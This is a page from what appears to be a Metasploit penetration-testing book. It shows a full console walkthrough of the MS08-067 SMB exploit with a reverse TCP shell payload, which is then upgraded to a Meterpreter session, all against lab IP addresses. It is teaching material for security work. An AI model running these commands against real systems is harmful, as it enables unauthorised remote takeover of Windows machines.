background image

96

Chapter 6

into the network. Let’s look at a quick example from start to finish using 
MS08-067 with a reverse command shell as the payload, and upgrade it to a 
Meterpreter shell.

root@bt:/opt/framework3/msf3# 

msfconsole

msf > 

search ms08_067

[*] Searching loaded modules for pattern 'ms08_067'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack

Corruption

msf > 

use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > 

set PAYLOAD windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > 

set TARGET 3

target => 3
msf exploit(ms08_067_netapi) > 

setg LHOST 192.168.33.129

 

LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > 

setg LPORT 8080

LPORT => 8080
msf exploit(ms08_067_netapi) > 

exploit -z

 

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > 

sessions -u 1

 

[*] Started reverse handler on 192.168.33.129:8080
[*] Starting the payload handler...
[*] Command Stager progress - 3.16% done (1694/53587 bytes)
[*] Command Stager progress - 6.32% done (3388/53587 bytes)

. . . SNIP . . .

[*] Command Stager progress - 97.99% done (52510/53587 bytes)
[*] Sending stage (748032 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 ->

192.168.33.130:1044)

msf exploit(ms08_067_netapi) > 

sessions -i

 

2

[*] Starting interaction with 2...
meterpreter >

At   we issue the 

setg

 command for 

LHOST

 and 

LPORT

, which is required in 

order for the 

sessions -u 1

 to upgrade to Meterpreter at  . (The 

setg

 command 

sets the 

LPORT

 and 

LHOST

 globally in Metasploit, not just for this exploit.)